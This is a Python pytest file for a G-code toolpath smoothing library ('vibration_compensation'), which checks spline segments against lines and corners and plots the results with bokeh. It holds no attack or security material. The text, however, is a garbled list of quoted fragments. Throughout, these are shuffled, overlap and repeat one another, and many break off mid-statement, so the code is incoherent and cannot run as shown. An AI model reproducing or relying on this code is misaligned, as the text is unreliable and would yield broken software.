"segment is not on the line\" assert point_on_line(self.start_point, self.end_point, self.spline(self.spline_mid)) == pytest.approx(0, abs=1e-12),",
"\"middle\": checker.check_end_point_middle() else: assert False, \"Invalid end type\" checker.check_continuity() def corner_segment(data, l, s,",
"< data.start_xy.shape[0] - 1: self.start_next_line_dist = self.start_line_dist + self.line_length self.next_line_length = xy_lengths[l+1] def",
"l != data.start_xy.shape[0] - 1: self.next_start_point = data.start_xy[l+1] self.next_end_point = data.end_xy[l+1] self.spline =",
"plotter(data) def test_obtuse_corner_with_shorter_and_longer_line(plotter): data = generate_curves([ \"G1 X10 Y0\", \"G1 X30 Y0.1\" ],",
"straight_segment(data, l=1, s=3, start=\"end\", end=\"end\") straight_segment(data, l=3, s=4, start=\"start\", end=\"end\") assert np.sum(data.smoothed_toolpath.segment_lengths) <",
"+ np.linalg.norm([10, 0.1]) + np.linalg.norm([10, 0.2]) assert np.sum(data.smoothed_toolpath.segment_lengths) == \\ pytest.approx(10 + np.linalg.norm([10,",
"spline segment is not on the line\" assert point_on_line(self.start_point, self.end_point, self.spline(self.spline_mid)) == pytest.approx(0,",
"Y-100\", \"G1 X-200 Y-100\" ], maximum_error=0.01) assert data.smoothed_toolpath.segment_start.shape[0] == 3 straight_segment(data, l=0, s=0,",
"1: self.start_next_line_dist = self.start_line_dist + self.line_length self.next_line_length = xy_lengths[l+1] def check_distance(self, spline, line):",
"self.spline(self.spline_mid)) == pytest.approx(0, abs=1e-12), msg self.check_distance(self.spline_mid, 0.5) def check_point_on_line(self): msg = \"The middle",
"check_line_start_point_end(self): msg = \"The start point of the spline segment is not on",
"checker.check_corner_middle_short() if end == \"on\": checker.check_corner_end_point_on() elif end == \"middle\": checker.check_corner_end_point_middle() else: assert",
"assert prev_end == self.spline_start, \\ \"The previous segment does not end where the",
"mid) class SegmentChecker(object): def __init__(self,data, l, s, start, end, corner): self.data = data",
"def figures(): path, filename = os.path.split(os.path.realpath(__file__)) path = os.path.join(path, \"output\") os.makedirs(path, exist_ok=True) plt.output_file(os.path.join(path,",
"segment is not on the line\" def check_end_point_on(self): assert point_on_line(self.start_point, self.end_point, self.spline(self.spline_end)) ==",
"<\\ 10 + np.linalg.norm([10, 0.1]) + np.linalg.norm([10, 0.2]) assert np.sum(data.smoothed_toolpath.segment_lengths) == \\ pytest.approx(10",
"data = generate_curves([ \"G1 X20 Y0\", \"G1 X30 Y-0.1\" ], maximum_error=0.01) assert data.smoothed_toolpath.segment_start.shape[0]",
"250), match_aspect=True, lod_threshold=None, title=request.node.name ) p.segment( x0=data.start_xy[:, 0], x1=data.end_xy[:, 0], y0=data.start_xy[:, 1], y1=data.end_xy[:,",
"line_width=2, line_color=\"blue\", line_dash=\"solid\" ) p.circle( points[:,0], points[:,1], size=4, fill_color=\"white\" ) figures.append(p) return plot",
"end=\"end\") assert np.sum(data.smoothed_toolpath.segment_lengths) < 10 + np.linalg.norm([20, 0.1]) assert np.sum(data.smoothed_toolpath.segment_lengths) == \\ pytest.approx(10",
"the current one starts\" assert_array_almost_equal(self.spline(self.spline_start-1e-12), self.spline(self.spline_start), err_msg=msg) assert self.spline.distance(self.spline_start-1e-12) <=\\ self.spline.distance(self.spline_start) and \\",
"= xy_lengths[l+1] def check_distance(self, spline, line): msg = \"The spline start distance does",
"the current segment start do not match up\" def check_corner_spline_order(self): assert self.spline_end >",
"l=1, s=3, start=\"on\", end=\"on\") straight_segment(data, l=2, s=4, start=\"on\", end=\"end\") assert np.sum(data.smoothed_toolpath.segment_lengths) < 300",
"\"The start point of the spline segment does not match the line start",
"assert np.sum(data.smoothed_toolpath.segment_lengths) < 100 + np.linalg.norm([100, 1]) assert np.sum(data.smoothed_toolpath.segment_lengths) == \\ pytest.approx(100 +",
"not match the line end point\" assert_array_almost_equal(self.spline(self.spline_end), self.end_point), msg self.check_distance(self.spline_end, 1.0) end_error_segment =",
"ts = data.smoothed_toolpath.fixed_curvature_speeds(0, data.smoothed_toolpath.start_xy.shape[0], 0.1) points = data.smoothed_toolpath(ts) p.line( points[:,0], points[:,1], line_width=2, line_color=\"blue\",",
"point) + np.linalg.norm(lineb - point)\\ - np.linalg.norm(linea - lineb) def point_on_middle_of_line(linea, lineb, point):",
"do not match up\" def check_corner_spline_order(self): assert self.spline_end > self.spline_mid, \\ \"The endpoint",
"y_range=(-250, 250), match_aspect=True, lod_threshold=None, title=request.node.name ) p.segment( x0=data.start_xy[:, 0], x1=data.end_xy[:, 0], y0=data.start_xy[:, 1],",
"\\ \"The previous segment end distance and the current segment start do not",
"elif start == \"end\": checker.check_line_start_point_end() else: assert False, \"Invalid start type\" if start",
"abs=0.001), \\ \"The previous segment end distance and the current segment start do",
"np.sum(data.smoothed_toolpath.segment_lengths) == \\ pytest.approx(300, abs=0.1) check_distances(data) plotter(data) def test_three_short_lines(plotter): data = generate_curves([ \"G1",
"np.sum(data.smoothed_toolpath.segment_lengths) == \\ pytest.approx(100 + np.linalg.norm([100, 1]), abs=0.1) check_distances(data) plotter(data) def test_135_corner(plotter): data",
"start point of the spline segment is not on the line\" assert point_on_line(self.start_point,",
"self.check_distance(self.spline_end, 1.5) def check_continuity(self): msg = \"There's a discontinuity at the end of",
"], maximum_error=0.01) assert data.smoothed_toolpath.segment_start.shape[0] == 2 straight_segment(data, l=0, s=0, start=\"start\", end=\"end\") straight_segment(data, l=1,",
"data.smoothed_toolpath.segment_start.shape[0] == 5 straight_segment(data, l=0, s=0, start=\"start\", end=\"on\") corner_segment(data, l=0, s=1, start=\"on\", end=\"on\")",
"\\ pytest.approx(10 + np.linalg.norm([10, 0.1]), abs=0.1) check_distances(data) plotter(data) def test_obtuse_corner_with_shorter_and_longer_line(plotter): data = generate_curves([",
"self.spline_start = data.smoothed_toolpath.segment_start[s] self.spline_end = data.smoothed_toolpath.segment_end[s] self.spline_mid = (self.spline_start + self.spline_end) / 2.0",
"is not on the end of the line\" assert_array_almost_equal(self.spline(self.spline_start), self.end_point, err_msg=msg) self.check_distance(self.spline_start, 1.0)",
"maximum_error=0.01) assert data.smoothed_toolpath.segment_start.shape[0] == 5 straight_segment(data, l=0, s=0, start=\"start\", end=\"middle\") corner_segment(data, l=0, s=1,",
"straight_segment(data, l=0, s=0, start=\"start\", end=\"on\") corner_segment(data, l=0, s=1, start=\"on\", end=\"on\") straight_segment(data, l=1, s=2,",
"s=2, start=\"on\", end=\"end\") assert np.sum(data.smoothed_toolpath.segment_lengths) < 100 + np.linalg.norm([100, 100]) assert np.sum(data.smoothed_toolpath.segment_lengths) ==",
"l=0, s=0, start=\"start\", end=\"middle\") corner_segment(data, l=0, s=1, start=\"middle\", end=\"on\") straight_segment(data, l=1, s=2, start=\"on\",",
"s=0, start=\"start\", end=\"middle\") corner_segment(data, l=0, s=1, start=\"middle\", end=\"on\") straight_segment(data, l=1, s=2, start=\"on\", end=\"end\")",
"def test_135_corner(plotter): data = generate_curves([ \"G1 X100 Y0\", \"G1 X200 Y100\" ], maximum_error=0.01)",
"assert False, \"Invalid end type\" checker.check_continuity() def check_distances(data): t = data.smoothed_toolpath.fixed_distances(0, data.smoothed_toolpath.total_distance(), 10)",
"the line start point\" assert_array_almost_equal(self.spline(self.spline_start), self.start_point, err_msg=msg) self.check_distance(self.spline_start, 0) def check_start_point_on(self): msg =",
"self.start_line_dist = np.sum(xy_lengths[:l]) self.line_length = xy_lengths[l] if l < data.start_xy.shape[0] - 1: self.start_next_line_dist",
"+ np.linalg.norm([50, 50]) ) check_distances(data) plotter(data) def test_90_corner(plotter): data = generate_curves([ \"G1 X100",
"np.linalg.norm([100, 100]), abs=0.1) check_distances(data) plotter(data) def test_very_acute_corner(plotter): data = generate_curves([ \"G1 X100 Y0\",",
"\"G1 X10 Y0\", \"G1 X30 Y0.1\" ], maximum_error=0.01) assert data.smoothed_toolpath.segment_start.shape[0] == 3 straight_segment(data,",
"self.spline(self.spline_mid)) <= 0.01,\\ SegmentChecker.corner_error self.check_distance(self.spline_mid, 1.0) def check_corner_middle_short(self): assert np.linalg.norm(self.end_point - self.spline(self.spline_mid)) ==\\",
"plotter(data) def test_two_straight_lines(plotter): data = generate_curves([ \"G1 X50 Y50\", \"G1 X100 Y100\" ],",
"checker.check_continuity() def check_distances(data): t = data.smoothed_toolpath.fixed_distances(0, data.smoothed_toolpath.total_distance(), 10) assert_array_almost_equal(data.smoothed_toolpath.distance(t), np.linspace(0, data.smoothed_toolpath.total_distance(), 10)) def",
"\\ pytest.approx(20 + np.linalg.norm([10, 0.1]), abs=0.1) check_distances(data) plotter(data) def test_three_long_lines(plotter): data = generate_curves([",
"==\\ pytest.approx(np.linalg.norm([100, 200])) check_distances(data) plotter(data) def test_two_straight_lines(plotter): data = generate_curves([ \"G1 X50 Y50\",",
"\"G1 X100 Y100\" ], maximum_error=0.01) assert data.smoothed_toolpath.segment_start.shape[0] == 2 straight_segment(data, l=0, s=0, start=\"start\",",
"< 300 assert np.sum(data.smoothed_toolpath.segment_lengths) == \\ pytest.approx(300, abs=0.1) check_distances(data) plotter(data) def test_three_short_lines(plotter): data",
"= generate_curves([ \"G1 X10 Y0\", \"G1 X20 Y0.1\", \"G1 X30 Y0.3\" ], maximum_error=0.01)",
"s=1, start=\"on\", end=\"on\") straight_segment(data, l=1, s=2, start=\"on\", end=\"end\") straight_segment(data, l=1, s=3, start=\"end\", end=\"end\")",
"straight_segment(data, l=0, s=0, start=\"start\", end=\"end\") straight_segment(data, l=1, s=1, start=\"start\", end=\"end\") assert np.sum(data.smoothed_toolpath.segment_lengths) ==",
"end of the spline segment\" if self.s > 0: prev_end = self.data.smoothed_toolpath.segment_end[self.s-1] assert",
"< 200.0 assert np.sum(data.smoothed_toolpath.segment_lengths) == pytest.approx(200, abs=0.1) check_distances(data) plotter(data) def test_45_corner(plotter): data =",
"of the spline segment is not on the line\" def check_end_point_on(self): assert point_on_line(self.start_point,",
"match the line start point\" assert_array_almost_equal(self.spline(self.spline_start), self.start_point, err_msg=msg) self.check_distance(self.spline_start, 0) def check_start_point_on(self): msg",
"end=\"on\") straight_segment(data, l=1, s=2, start=\"on\", end=\"end\") assert np.sum(data.smoothed_toolpath.segment_lengths) < 200.0 assert np.sum(data.smoothed_toolpath.segment_lengths) ==",
"= data.smoothed_toolpath.segment_start[s] self.spline_end = data.smoothed_toolpath.segment_end[s] self.spline_mid = (self.spline_start + self.spline_end) / 2.0 xy_lengths",
"check_distances(data) plotter(data) def test_135_corner_counter_clockwise(plotter): data = generate_curves([ \"G1 X-100 Y-100\", \"G1 X-200 Y-100\"",
"discontinuity at the end of the spline segment\" if self.s > 0: prev_end",
"__init__(self,data, l, s, start, end, corner): self.data = data self.s = s self.start",
"def check_corner_end_point_on(self): assert point_on_line(self.next_start_point, self.next_end_point, self.spline(self.spline_end)) == pytest.approx(0, abs=1e-12),\\ SegmentChecker.end_error_segment end_error_segment_middle = \"The",
"plt @pytest.fixture(scope=\"module\") def figures(): path, filename = os.path.split(os.path.realpath(__file__)) path = os.path.join(path, \"output\") os.makedirs(path,",
"segment does not match the line start point\" assert_array_almost_equal(self.spline(self.spline_start), self.start_point, err_msg=msg) self.check_distance(self.spline_start, 0)",
"\"G1 X100 Y200\" ], maximum_error=0.01) assert data.smoothed_toolpath.segment_start.shape[0] == 1 straight_segment(data, l=0, s=0, start=\"start\",",
"os.path.splitext(filename)[0] + \".html\")) ret = [] yield ret plt.save(ret) def generate_curves(gcode, maximum_error): data",
"assert self.spline.distance(spline) <= line_dist and \\ self.spline.distance(spline) == pytest.approx(line_dist, abs=0.1), \\ msg def",
"def check_point_on_line(self): msg = \"The middle point of the spline segment is not",
"of the spline segment is not on the line\" assert point_on_line(self.start_point, self.end_point, self.spline(self.spline_start))",
"self.end_point, self.spline(self.spline_end)) == \\ pytest.approx(0, abs=1e-12), SegmentChecker.end_error_segment def check_corner_end_point_on(self): assert point_on_line(self.next_start_point, self.next_end_point, self.spline(self.spline_end))",
"def check_corner_spline_order(self): assert self.spline_end > self.spline_mid, \\ \"The endpoint of the corner spline",
"spline segment does not match the line start point\" assert_array_almost_equal(self.spline(self.spline_start), self.start_point, err_msg=msg) self.check_distance(self.spline_start,",
"the line\" assert_array_almost_equal(self.spline(self.spline_start), self.end_point, err_msg=msg) self.check_distance(self.spline_start, 1.0) def check_point_on_middle_of_line(self): msg = \"The middle",
"generate_curves(gcode, maximum_error): data = read_gcode(gcode, maximum_error) return data @pytest.fixture(scope=\"function\") def plotter(figures, request): def",
"l=1, s=2, start=\"middle\", end=\"end\") assert np.sum(data.smoothed_toolpath.segment_lengths) < 20 + np.linalg.norm([10, 0.1]) assert np.sum(data.smoothed_toolpath.segment_lengths)",
"spline segment does not match the line end point\" assert_array_almost_equal(self.spline(self.spline_end), self.end_point), msg self.check_distance(self.spline_end,",
"start=\"start\", end=\"end\") assert np.sum(data.smoothed_toolpath.segment_lengths) < 300 assert np.sum(data.smoothed_toolpath.segment_lengths) == \\ pytest.approx(300, abs=0.1) check_distances(data)",
"y1=data.end_xy[:, 1], line_width=1, line_color=\"red\", line_dash=\"dotted\" ) ts = data.smoothed_toolpath.fixed_curvature_speeds(0, data.smoothed_toolpath.start_xy.shape[0], 0.1) points =",
"abs=1e-12), msg def check_line_start_point_middle(self): msg = \"The start point of the spline segment",
"segment end distance and the current segment start do not match up\" def",
"def test_three_long_lines(plotter): data = generate_curves([ \"G1 X100 Y0\", \"G1 X100 Y100\", \"G1 X0",
"\\ \"The endpoint of the corner spline is before the line segment end\"",
"<= 1.0: line_dist = self.start_line_dist + self.line_length * line else: line_dist = self.start_next_line_dist",
"checker.check_point_on_middle_of_line() else: checker.check_point_on_line() if end == \"end\": checker.check_end_point_end() elif end == \"on\": checker.check_end_point_on()",
"data.start_xy, axis=1) self.start_line_dist = np.sum(xy_lengths[:l]) self.line_length = xy_lengths[l] if l < data.start_xy.shape[0] -",
"Y0\", \"G1 X200 Y1\" ], maximum_error=0.01) assert data.smoothed_toolpath.segment_start.shape[0] == 3 straight_segment(data, l=0, s=0,",
"plotter(data) def test_obtuse_corner_with_short_lines(plotter): data = generate_curves([ \"G1 X10 Y0\", \"G1 X20 Y0.1\" ],",
"start=\"on\", end=\"middle\") straight_segment(data, l=1, s=2, start=\"middle\", end=\"end\") assert np.sum(data.smoothed_toolpath.segment_lengths) < 20 + np.linalg.norm([10,",
"* (line-1.0) assert self.spline.distance(spline) <= line_dist and \\ self.spline.distance(spline) == pytest.approx(line_dist, abs=0.1), \\",
"l=2, s=4, start=\"middle\", end=\"end\") assert np.sum(data.smoothed_toolpath.segment_lengths) <\\ 10 + np.linalg.norm([10, 0.1]) + np.linalg.norm([10,",
"point of the spline segment is not on the middle of the line\"",
"end == \"on\": checker.check_end_point_on() elif end == \"middle\": checker.check_end_point_middle() else: assert False, \"Invalid",
"point_on_line(self.start_point, self.end_point, self.spline(self.spline_start)) == \\ pytest.approx(0, abs=1e-12), msg def check_line_start_point_middle(self): msg = \"The",
"\"G1 X20 Y0.1\" ], maximum_error=0.01) assert data.smoothed_toolpath.segment_start.shape[0] == 3 straight_segment(data, l=0, s=0, start=\"start\",",
"def plotter(figures, request): def plot(data: Data): p = plt.Figure( plot_width=1000, plot_height=1000, x_range=(-250, 250),",
"vibration_compensation.bokeh_imports as plt @pytest.fixture(scope=\"module\") def figures(): path, filename = os.path.split(os.path.realpath(__file__)) path = os.path.join(path,",
"point\" assert_array_almost_equal(self.spline(self.spline_start), self.start_point, err_msg=msg) self.check_distance(self.spline_start, 0) def check_start_point_on(self): msg = \"The start point",
"data.smoothed_toolpath.fixed_distances(0, data.smoothed_toolpath.total_distance(), 10) assert_array_almost_equal(data.smoothed_toolpath.distance(t), np.linspace(0, data.smoothed_toolpath.total_distance(), 10)) def test_straight_line(plotter): data = generate_curves([ \"G1",
"spline segment is not on the middle of the line\" def check_end_point_middle(self): assert",
"20 + np.linalg.norm([10, 0.1]) assert np.sum(data.smoothed_toolpath.segment_lengths) == \\ pytest.approx(20 + np.linalg.norm([10, 0.1]), abs=0.1)",
"self.spline(self.spline_start), err_msg=msg) assert self.spline.distance(self.spline_start-1e-12) <=\\ self.spline.distance(self.spline_start) and \\ self.spline.distance(self.spline_start-1e-12) == \\ pytest.approx(self.spline.distance(self.spline_start), abs=0.001),",
"\"The closest point of the corner is not close enough\" def check_corner_middle_normal(self): assert",
"numpy.testing import * import numpy as np import scipy as sp import vibration_compensation.bokeh_imports",
"s=2, start=\"on\", end=\"end\") assert np.sum(data.smoothed_toolpath.segment_lengths) < 200.0 assert np.sum(data.smoothed_toolpath.segment_lengths) == pytest.approx(200, abs=0.1) check_distances(data)",
"end=\"end\") assert np.sum(data.smoothed_toolpath.segment_lengths) < 20 + np.linalg.norm([10, 0.1]) assert np.sum(data.smoothed_toolpath.segment_lengths) == \\ pytest.approx(20",
"10) assert_array_almost_equal(data.smoothed_toolpath.distance(t), np.linspace(0, data.smoothed_toolpath.total_distance(), 10)) def test_straight_line(plotter): data = generate_curves([ \"G1 X100 Y200\"",
"corner_segment(data, l=0, s=1, start=\"on\", end=\"on\") straight_segment(data, l=1, s=2, start=\"on\", end=\"on\") corner_segment(data, l=1, s=3,",
"of the spline segment does not match the line start point\" assert_array_almost_equal(self.spline(self.spline_start), self.start_point,",
"== \\ pytest.approx(100 + np.linalg.norm([100, 100]), abs=0.1) check_distances(data) plotter(data) def test_very_obtuse_corner(plotter): data =",
"and \\ self.spline.distance(spline) == pytest.approx(line_dist, abs=0.1), \\ msg def check_start_point_start(self): msg = \"The",
"the middle of the line\" def check_end_point_middle(self): assert point_on_middle_of_line(self.start_point, self.end_point, self.spline(self.spline_end)) == pytest.approx(0,",
"0.5 + linea return np.linalg.norm(point - mid) class SegmentChecker(object): def __init__(self,data, l, s,",
"data.smoothed_toolpath.segment_start[s] self.spline_end = data.smoothed_toolpath.segment_end[s] self.spline_mid = (self.spline_start + self.spline_end) / 2.0 xy_lengths =",
"\\ pytest.approx(10 + np.linalg.norm([20, 0.1]), abs=0.1) check_distances(data) plotter(data) def test_obtuse_corner_with_longer_and_shorter_line(plotter): data = generate_curves([",
"0.2]), abs=0.1) check_distances(data) plotter(data) def test_three_long_lines_with_z_move(plotter): data = generate_curves([ \"G1 X100 Y0\", \"G1",
"test_135_corner_counter_clockwise(plotter): data = generate_curves([ \"G1 X-100 Y-100\", \"G1 X-200 Y-100\" ], maximum_error=0.01) assert",
"pytest.approx(0, abs=1e-12),\\ SegmentChecker.end_error_segment end_error_segment_middle = \"The end point of the spline segment is",
"on the line\" assert point_on_line(self.start_point, self.end_point, self.spline(self.spline_mid)) == pytest.approx(0, abs=1e-12), msg def check_end_point_end(self):",
"= data.smoothed_toolpath.segment_start[s] self.spline_mid = l + 1.0 self.spline_end = data.smoothed_toolpath.segment_end[s] else: self.spline_start =",
"- np.linalg.norm(linea - lineb) def point_on_middle_of_line(linea, lineb, point): mid = (lineb - linea)",
"X200 Y1\" ], maximum_error=0.01) assert data.smoothed_toolpath.segment_start.shape[0] == 3 straight_segment(data, l=0, s=0, start=\"start\", end=\"on\")",
"if corner: self.spline_start = data.smoothed_toolpath.segment_start[s] self.spline_mid = l + 1.0 self.spline_end = data.smoothed_toolpath.segment_end[s]",
"msg self.check_distance(self.spline_end, 1.0) end_error_segment = \"The end point of the spline segment is",
"* line else: line_dist = self.start_next_line_dist + self.next_line_length * (line-1.0) assert self.spline.distance(spline) <=",
"is before the line segment end\" corner_error = \"The closest point of the",
"s=0, start=\"start\", end=\"on\") corner_segment(data, l=0, s=1, start=\"on\", end=\"middle\") straight_segment(data, l=1, s=2, start=\"middle\", end=\"end\")",
"very short straight_segment(data, l=1, s=2, start=\"middle\", end=\"middle\") corner_segment(data, l=1, s=3, start=\"middle\", end=\"middle\") straight_segment(data,",
"X10 Y0\", \"G1 X20 Y0.1\", \"G1 X30 Y0.3\" ], maximum_error=0.01) assert data.smoothed_toolpath.segment_start.shape[0] ==",
"= s self.start = start self.end = end self.start_point = data.start_xy[l] self.end_point =",
"s=0, start=\"start\", end=\"on\") corner_segment(data, l=0, s=1, start=\"on\", end=\"on\") straight_segment(data, l=1, s=2, start=\"on\", end=\"end\")",
"\\ msg def check_start_point_start(self): msg = \"The start point of the spline segment",
"msg def check_end_point_end(self): msg = \"The end point of the spline segment does",
"X100 Y100\" ], maximum_error=0.01) assert data.smoothed_toolpath.segment_start.shape[0] == 2 straight_segment(data, l=0, s=0, start=\"start\", end=\"end\")",
"0.2]) assert np.sum(data.smoothed_toolpath.segment_lengths) == \\ pytest.approx(10 + np.linalg.norm([10, 0.1]) + np.linalg.norm([10, 0.2]), abs=0.1)",
"of the line\" def check_end_point_middle(self): assert point_on_middle_of_line(self.start_point, self.end_point, self.spline(self.spline_end)) == pytest.approx(0, abs=1e-3),\\ SegmentChecker.end_error_segment_middle",
"3 straight_segment(data, l=0, s=0, start=\"start\", end=\"on\") corner_segment(data, l=0, s=1, start=\"on\", end=\"on\") straight_segment(data, l=1,",
"start=\"middle\", end=\"middle\") straight_segment(data, l=1, s=2, start=\"middle\", end=\"end\") assert np.sum(data.smoothed_toolpath.segment_lengths) < 10 + np.linalg.norm([10,",
"middle of the line\" assert point_on_middle_of_line(self.start_point, self.end_point, self.spline(self.spline_start)) == pytest.approx(0, abs=1e-3), msg self.check_distance(self.spline_start,",
"line\" assert point_on_middle_of_line(self.start_point, self.end_point, self.spline(self.spline_mid)) == pytest.approx(0, abs=1e-12), msg self.check_distance(self.spline_mid, 0.5) def check_point_on_line(self):",
"test_very_obtuse_corner(plotter): data = generate_curves([ \"G1 X100 Y0\", \"G1 X200 Y1\" ], maximum_error=0.01) assert",
"else: assert False, \"Invalid end type\" checker.check_continuity() def corner_segment(data, l, s, start, end):",
"np import scipy as sp import vibration_compensation.bokeh_imports as plt @pytest.fixture(scope=\"module\") def figures(): path,",
"\"G1 X0 Y100\" ], maximum_error=0.01) assert data.smoothed_toolpath.segment_start.shape[0] == 3 straight_segment(data, l=0, s=0, start=\"start\",",
"msg def check_line_start_point_middle(self): msg = \"The start point of the spline segment is",
"s, start, end, True) checker.check_corner_spline_order() if start == \"on\": checker.check_start_point_on() elif start ==",
"assert np.sum(data.smoothed_toolpath.segment_lengths) ==\\ pytest.approx(np.linalg.norm([100, 200])) check_distances(data) plotter(data) def test_two_straight_lines(plotter): data = generate_curves([ \"G1",
"(self.spline_start + self.spline_end) / 2.0 xy_lengths = np.linalg.norm(data.end_xy - data.start_xy, axis=1) self.start_line_dist =",
"self.end = end self.start_point = data.start_xy[l] self.end_point = data.end_xy[l] if l != data.start_xy.shape[0]",
"else: checker.check_corner_middle_short() if end == \"on\": checker.check_corner_end_point_on() elif end == \"middle\": checker.check_corner_end_point_middle() else:",
"+ linea return np.linalg.norm(point - mid) class SegmentChecker(object): def __init__(self,data, l, s, start,",
"assert point_on_middle_of_line(self.next_start_point, self.next_end_point, self.spline(self.spline_end)) == pytest.approx(0, abs=1e-3),\\ SegmentChecker.end_error_segment_middle self.check_distance(self.spline_end, 1.5) def check_continuity(self): msg",
"line): msg = \"The spline start distance does not match\" if line <=",
"== \\ pytest.approx(100 + np.linalg.norm([100, 100]), abs=0.1) check_distances(data) plotter(data) def test_very_acute_corner(plotter): data =",
"\\ pytest.approx(10 + np.linalg.norm([10, 0.1]) + np.linalg.norm([10, 0.2]), abs=0.1) check_distances(data) plotter(data) def test_three_long_lines_with_z_move(plotter):",
"50]) ) check_distances(data) plotter(data) def test_90_corner(plotter): data = generate_curves([ \"G1 X100 Y0\", \"G1",
"corner spline is before the line segment end\" corner_error = \"The closest point",
"check_end_point_end(self): msg = \"The end point of the spline segment does not match",
"data.smoothed_toolpath.total_distance(), 10)) def test_straight_line(plotter): data = generate_curves([ \"G1 X100 Y200\" ], maximum_error=0.01) assert",
"of the corner is not close enough\" def check_corner_middle_normal(self): assert np.linalg.norm(self.end_point - self.spline(self.spline_mid))",
"3 straight_segment(data, l=0, s=0, start=\"start\", end=\"middle\") corner_segment(data, l=0, s=1, start=\"middle\", end=\"on\") straight_segment(data, l=1,",
"generate_curves([ \"G1 X-100 Y-100\", \"G1 X-200 Y-100\" ], maximum_error=0.01) assert data.smoothed_toolpath.segment_start.shape[0] == 3",
"l=1, s=2, start=\"on\", end=\"end\") assert np.sum(data.smoothed_toolpath.segment_lengths) < 10 + np.linalg.norm([20, 0.1]) assert np.sum(data.smoothed_toolpath.segment_lengths)",
"= \"There's a discontinuity at the end of the spline segment\" if self.s",
"X100 Y100\", \"G1 Z10\", \"G1 X0 Y100\" ], maximum_error=0.01) assert data.smoothed_toolpath.segment_start.shape[0] == 5",
"plt.save(ret) def generate_curves(gcode, maximum_error): data = read_gcode(gcode, maximum_error) return data @pytest.fixture(scope=\"function\") def plotter(figures,",
"s self.start = start self.end = end self.start_point = data.start_xy[l] self.end_point = data.end_xy[l]",
"self.next_line_length * (line-1.0) assert self.spline.distance(spline) <= line_dist and \\ self.spline.distance(spline) == pytest.approx(line_dist, abs=0.1),",
"def check_continuity(self): msg = \"There's a discontinuity at the end of the spline",
"end=\"on\") straight_segment(data, l=1, s=2, start=\"on\", end=\"end\") assert np.sum(data.smoothed_toolpath.segment_lengths) < 100 + np.linalg.norm([100, 1])",
"start self.end = end self.start_point = data.start_xy[l] self.end_point = data.end_xy[l] if l !=",
"check_corner_end_point_on(self): assert point_on_line(self.next_start_point, self.next_end_point, self.spline(self.spline_end)) == pytest.approx(0, abs=1e-12),\\ SegmentChecker.end_error_segment end_error_segment_middle = \"The end",
"assert False, \"Invalid end type\" checker.check_continuity() def corner_segment(data, l, s, start, end): checker",
"lod_threshold=None, title=request.node.name ) p.segment( x0=data.start_xy[:, 0], x1=data.end_xy[:, 0], y0=data.start_xy[:, 1], y1=data.end_xy[:, 1], line_width=1,",
"line\" assert point_on_line(self.start_point, self.end_point, self.spline(self.spline_start)) == \\ pytest.approx(0, abs=1e-12), msg def check_line_start_point_middle(self): msg",
"of the line\" assert_array_almost_equal(self.spline(self.spline_start), self.end_point, err_msg=msg) self.check_distance(self.spline_start, 1.0) def check_point_on_middle_of_line(self): msg = \"The",
"np.linalg.norm([100, 1]), abs=0.1) check_distances(data) plotter(data) def test_135_corner(plotter): data = generate_curves([ \"G1 X100 Y0\",",
"check_start_point_start(self): msg = \"The start point of the spline segment does not match",
"of the spline segment is not on the line\" assert point_on_line(self.start_point, self.end_point, self.spline(self.spline_mid))",
"\"The middle point of the spline segment is not on the line\" assert",
"start type\" if start == \"start\" and end == \"end\": checker.check_point_on_middle_of_line() else: checker.check_point_on_line()",
"s=1, start=\"middle\", end=\"middle\") # Note that this line is very short straight_segment(data, l=1,",
"= generate_curves([ \"G1 X100 Y0\", \"G1 X100 Y100\" ], maximum_error=0.01) assert data.smoothed_toolpath.segment_start.shape[0] ==",
"straight_segment(data, l=1, s=1, start=\"start\", end=\"end\") assert np.sum(data.smoothed_toolpath.segment_lengths) == \\ pytest.approx( np.linalg.norm([50, 50]) +",
") figures.append(p) return plot def point_on_line(linea, lineb, point): return np.linalg.norm(linea - point) +",
"(lineb - linea) * 0.5 + linea return np.linalg.norm(point - mid) class SegmentChecker(object):",
"= l + 1.0 self.spline_end = data.smoothed_toolpath.segment_end[s] else: self.spline_start = data.smoothed_toolpath.segment_start[s] self.spline_end =",
"self.s > 0: prev_end = self.data.smoothed_toolpath.segment_end[self.s-1] assert prev_end == self.spline_start, \\ \"The previous",
"X-200 Y-100\" ], maximum_error=0.01) assert data.smoothed_toolpath.segment_start.shape[0] == 3 straight_segment(data, l=0, s=0, start=\"start\", end=\"on\")",
"the spline segment is not on the line\" assert point_on_line(self.start_point, self.end_point, self.spline(self.spline_start)) ==",
"\"There's a discontinuity at the end of the spline segment\" if self.s >",
"self.end_point, err_msg=msg) self.check_distance(self.spline_start, 1.0) def check_point_on_middle_of_line(self): msg = \"The middle point of the",
"\"middle\": checker.check_line_start_point_middle() else: assert False, \"Invalid start type\" if start == \"middle\" or",
"np.sum(data.smoothed_toolpath.segment_lengths) < 100 + np.linalg.norm([100, 100]) assert np.sum(data.smoothed_toolpath.segment_lengths) == \\ pytest.approx(100 + np.linalg.norm([100,",
"os from vibration_compensation import read_gcode, Data import pytest from numpy.testing import * import",
"== \\ pytest.approx(20 + np.linalg.norm([10, 0.1]), abs=0.1) check_distances(data) plotter(data) def test_three_long_lines(plotter): data =",
"start=\"on\", end=\"on\") straight_segment(data, l=2, s=4, start=\"on\", end=\"end\") assert np.sum(data.smoothed_toolpath.segment_lengths) < 300 assert np.sum(data.smoothed_toolpath.segment_lengths)",
"start == \"start\": checker.check_start_point_start() elif start == \"on\": checker.check_start_point_on() elif start == \"middle\":",
"point of the spline segment does not match the line end point\" assert_array_almost_equal(self.spline(self.spline_end),",
"if end == \"on\": checker.check_corner_end_point_on() elif end == \"middle\": checker.check_corner_end_point_middle() else: assert False,",
"self.check_distance(self.spline_end, 0.5) def check_corner_end_point_middle(self): assert point_on_middle_of_line(self.next_start_point, self.next_end_point, self.spline(self.spline_end)) == pytest.approx(0, abs=1e-3),\\ SegmentChecker.end_error_segment_middle self.check_distance(self.spline_end,",
"plt.output_file(os.path.join(path, os.path.splitext(filename)[0] + \".html\")) ret = [] yield ret plt.save(ret) def generate_curves(gcode, maximum_error):",
"self.spline_mid = (self.spline_start + self.spline_end) / 2.0 xy_lengths = np.linalg.norm(data.end_xy - data.start_xy, axis=1)",
"== \\ pytest.approx(0, abs=1e-12), msg def check_line_start_point_middle(self): msg = \"The start point of",
"assert np.sum(data.smoothed_toolpath.segment_lengths) < 20 + np.linalg.norm([10, 0.1]) assert np.sum(data.smoothed_toolpath.segment_lengths) == \\ pytest.approx(20 +",
